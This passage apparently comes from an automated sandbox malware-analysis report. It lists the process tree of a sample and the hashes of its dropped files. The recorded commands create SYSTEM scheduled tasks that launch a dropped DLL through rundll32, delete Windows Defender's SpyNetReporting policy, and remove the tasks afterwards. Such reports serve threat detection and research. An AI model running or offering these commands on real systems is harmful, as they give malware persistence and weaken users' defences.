C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DmuWdpWCmdYRHkgJrjb2" /F /xml "C:\Program Files (x86)\AJYQrkrAhIRXC\DFBTUBL.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CDUwqlMPSeBRbvnPZ" /SC once /ST 05:44:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\PtFLChdTWFkbMOwK\AZePqCDP\MkluVpq.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CDUwqlMPSeBRbvnPZ"3⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1760
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:616
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1956
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wLvsIRnBfEcGhlAOV"3⤵PID:876
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PtFLChdTWFkbMOwK\AZePqCDP\MkluVpq.dll",#1 /site_id 5254032⤵PID:860
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PtFLChdTWFkbMOwK\AZePqCDP\MkluVpq.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1484 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CDUwqlMPSeBRbvnPZ"4⤵PID:2044
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1700
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:576
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1704
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57323b13d0f302d1a638643818b2ddd5e
SHA1b7f1371cb73c79204c45897417ec62dde24f4be3
SHA2565f7fff7774dbac48c620010e4237e1052441d5245d539926c40c82254ba530ec
SHA51246a1c7ed1bd572be6b2683693e299f63e3862f4c7d46d7b3344f73e0b42a486140c225bb04ee5a5c3f49728b83933645d466acd82d207819181d00614cb259de
-
Filesize
2KB
MD59fc8b033d56f3d38c50fe234dec56a83
SHA131bb9a27734d909b5b460fe937023117036cd602
SHA25647858a3448cdd4eccb1339e65d4d009deee80f84e284b1e9b1f9769af420baf0
SHA512bed8c2b720c924c854f0f838fbfaca5cde35df2341916025e05865292294e2e723c0cde891933c9b1ee4ba0de10f218903421b79bce0240111244cc63a2f93d4
-
Filesize
2KB
MD57c2c34daf6d21ed3f553e7b7d3bba297
SHA179f7ae62eb75d53c40020b8a0b2ee55310e3945a
SHA256b8048252f6c253f2da48c05611e3591bd40fb360afeb9084792b6bd04a841fa5
SHA5121c20ef79983c275ec8427486c82613dbc83844e5b4928897ddaae16d2e8bcf7d1caa66d5c4edfa87622a0e47d87d9af0e22b267413693d860f2ed4f2da8f241f
-
Filesize
2KB
MD586717c1d88b5b050c94ed0197d95857e
SHA1e4b806ba60b8144edd304a4e7121084a51e55ac0
SHA25637d9dc728e85bd4bae85df06248f2eac0fa390249d963ef21a261fd9007a630e
SHA512538f5387413aa426fc08f8ba95e2b27308ab8cdfd4080c7048c0c5014dced43f9bf8a1dfecef3cba65d4e6eeb08c71d19ea06600ea256be9f42394b1d8e64231
-
Filesize
2KB
MD585bd07e312f6727851850610d9bea501
SHA1df675efb19d89dcd76eebad8056ba2e0b6b71f75
SHA2560a142c181c369ac5aaf2240bb2060d041e46f80a80c07136652753dc4802161c
SHA512b562f8e216f4fc77dc095e955bf0dfbc5079784f2356c64d4b74bb057e90b7e310973283b5d66817ca2a5b45aec55f8d5a9f32de96b5841ac34293e0700b51bb
-
Filesize
6.3MB
MD53e2c486c6b397a3c96c5ae6c30de7924
SHA1beafeb2d21677cb2183f250812051fbc75527f4e
SHA2568dfdd352c3a42b7dd091b213852833a80cb62736948221b3300f571e353d676f
SHA512541ddbb71bb2e86b69cf637fbcc0f87417189fee4f60f2b67799476f2f858fa847d44c5e4f6ea15aa9f07b589210f68a5ab565f531f81ef9fab2071a535f2393
-
Filesize
6.3MB
MD53e2c486c6b397a3c96c5ae6c30de7924
SHA1beafeb2d21677cb2183f250812051fbc75527f4e
SHA2568dfdd352c3a42b7dd091b213852833a80cb62736948221b3300f571e353d676f
SHA512541ddbb71bb2e86b69cf637fbcc0f87417189fee4f60f2b67799476f2f858fa847d44c5e4f6ea15aa9f07b589210f68a5ab565f531f81ef9fab2071a535f2393
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59087d45d532e3f5809fcdcb17d1f2d42
SHA103400bc33da830876385c634a6b0ceb0bd801552
SHA256ba83efc296b6d68100205a8ead4aad8c63446f798b77de7c474c52fac5ec35de
SHA5123fd68fc8ced63ab0bc3f59e263cb69679a8e6b75ba036bf38b8a59a52e59bed9a25abd7c71e83fe39206808024c9086a54189da2a4a0f2cc67989ae0f75a7534
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD553f1794991c315cc71f9df781fb2433c
SHA1d4ad219053f4fe34b1dcb41ac074f4a9511a4d99
SHA256b849821ee46b3108d88334f39b7bbc09848a676f1d6cf01ad554270e4e4cce91
SHA512315dc8d985ea95c0b481abe7ba47d2f37798ab0716a284bec04f2b2b17e2c51f3919ef9b7ef5c63d413f1aea3cf8a60f71bdcc314770d4e8f029a91e1c61c523
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c56330c5bc13e09dabc29b2889dbc614
SHA1f2d5e5e85927d57d3712931b671dd19c28ccdf64
SHA256416ed76a946bee881fe2b4ce2a2b3ec3513c8523fa3eecb803fabfe97d35712d
SHA5120854c6a99300f485b83dfde7165c0c882602cfc977a0f2734539e184635fe3ad4d12d62b12760d9a01fb346bf413265f856ac14a949660f177678deaab7531bc
-
Filesize
6.2MB
MD50741904fe61ccfe04ba9b56fb861071e
SHA18335065335fcd5537d8576f251ceae517aacf5b5
SHA25652959c9c391cbc136dc25110362a9d113683a026a4adc38d1b794c7955fd2c17
SHA512a8d4c70bd2b02745673e3b69442c5c846d437a055b498a9dc29429a6f7d082f7f6fe8b20d5602fded57466a1687ed7b1e76147ba1918d0c2fc94265408720db4
-
Filesize
8KB
MD5ffca2d775fd6afce9e6d5fec1e6f67c9
SHA11fac8e5682af8c88fe1d767e2fe1829f01906f7c
SHA25681e3bf1d0078734ad18828b2dc783b15ad8391198ec46d34a754b6b7d68aa3ed
SHA51267217254cbb45697908c06cae51c864ef63614a49d96f68818eba6fbe7ae38cfa9f62325c24bf2524cfe0699deb2d2458f54ababdc24a8869d5ee0ec82f7700d
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba
-
Filesize
5KB
MD584b44f73ccd1ff03d775824aa4b0b066
SHA14b4cb01656f14d3ced1178105415919454d78bb2
SHA2566b02d81ad4b48917bd4ee1b02d3b132dcc4fc483539b427d1c44b267f143014b
SHA5127383323503af975f73de7a5802d946b7585dd53651c6c1cb9e4df88fe8789b3272cfdd3221f49a5090581b5d88560efffefd0484e9f568358d19e203b0a30a62
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD53e2c486c6b397a3c96c5ae6c30de7924
SHA1beafeb2d21677cb2183f250812051fbc75527f4e
SHA2568dfdd352c3a42b7dd091b213852833a80cb62736948221b3300f571e353d676f
SHA512541ddbb71bb2e86b69cf637fbcc0f87417189fee4f60f2b67799476f2f858fa847d44c5e4f6ea15aa9f07b589210f68a5ab565f531f81ef9fab2071a535f2393
-
Filesize
6.3MB
MD53e2c486c6b397a3c96c5ae6c30de7924
SHA1beafeb2d21677cb2183f250812051fbc75527f4e
SHA2568dfdd352c3a42b7dd091b213852833a80cb62736948221b3300f571e353d676f
SHA512541ddbb71bb2e86b69cf637fbcc0f87417189fee4f60f2b67799476f2f858fa847d44c5e4f6ea15aa9f07b589210f68a5ab565f531f81ef9fab2071a535f2393
-
Filesize
6.3MB
MD53e2c486c6b397a3c96c5ae6c30de7924
SHA1beafeb2d21677cb2183f250812051fbc75527f4e
SHA2568dfdd352c3a42b7dd091b213852833a80cb62736948221b3300f571e353d676f
SHA512541ddbb71bb2e86b69cf637fbcc0f87417189fee4f60f2b67799476f2f858fa847d44c5e4f6ea15aa9f07b589210f68a5ab565f531f81ef9fab2071a535f2393
-
Filesize
6.3MB
MD53e2c486c6b397a3c96c5ae6c30de7924
SHA1beafeb2d21677cb2183f250812051fbc75527f4e
SHA2568dfdd352c3a42b7dd091b213852833a80cb62736948221b3300f571e353d676f
SHA512541ddbb71bb2e86b69cf637fbcc0f87417189fee4f60f2b67799476f2f858fa847d44c5e4f6ea15aa9f07b589210f68a5ab565f531f81ef9fab2071a535f2393
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba
-
Filesize
7.0MB
MD58c94340110f911923720019e038dbc4d
SHA1534f1f1415337ac1147881432930c35a25206735
SHA256e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad
SHA5128accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba
-
Filesize
6.2MB
MD50741904fe61ccfe04ba9b56fb861071e
SHA18335065335fcd5537d8576f251ceae517aacf5b5
SHA25652959c9c391cbc136dc25110362a9d113683a026a4adc38d1b794c7955fd2c17
SHA512a8d4c70bd2b02745673e3b69442c5c846d437a055b498a9dc29429a6f7d082f7f6fe8b20d5602fded57466a1687ed7b1e76147ba1918d0c2fc94265408720db4
-
Filesize
6.2MB
MD50741904fe61ccfe04ba9b56fb861071e
SHA18335065335fcd5537d8576f251ceae517aacf5b5
SHA25652959c9c391cbc136dc25110362a9d113683a026a4adc38d1b794c7955fd2c17
SHA512a8d4c70bd2b02745673e3b69442c5c846d437a055b498a9dc29429a6f7d082f7f6fe8b20d5602fded57466a1687ed7b1e76147ba1918d0c2fc94265408720db4
-
Filesize
6.2MB
MD50741904fe61ccfe04ba9b56fb861071e
SHA18335065335fcd5537d8576f251ceae517aacf5b5
SHA25652959c9c391cbc136dc25110362a9d113683a026a4adc38d1b794c7955fd2c17
SHA512a8d4c70bd2b02745673e3b69442c5c846d437a055b498a9dc29429a6f7d082f7f6fe8b20d5602fded57466a1687ed7b1e76147ba1918d0c2fc94265408720db4
-
Filesize
6.2MB
MD50741904fe61ccfe04ba9b56fb861071e
SHA18335065335fcd5537d8576f251ceae517aacf5b5
SHA25652959c9c391cbc136dc25110362a9d113683a026a4adc38d1b794c7955fd2c17
SHA512a8d4c70bd2b02745673e3b69442c5c846d437a055b498a9dc29429a6f7d082f7f6fe8b20d5602fded57466a1687ed7b1e76147ba1918d0c2fc94265408720db4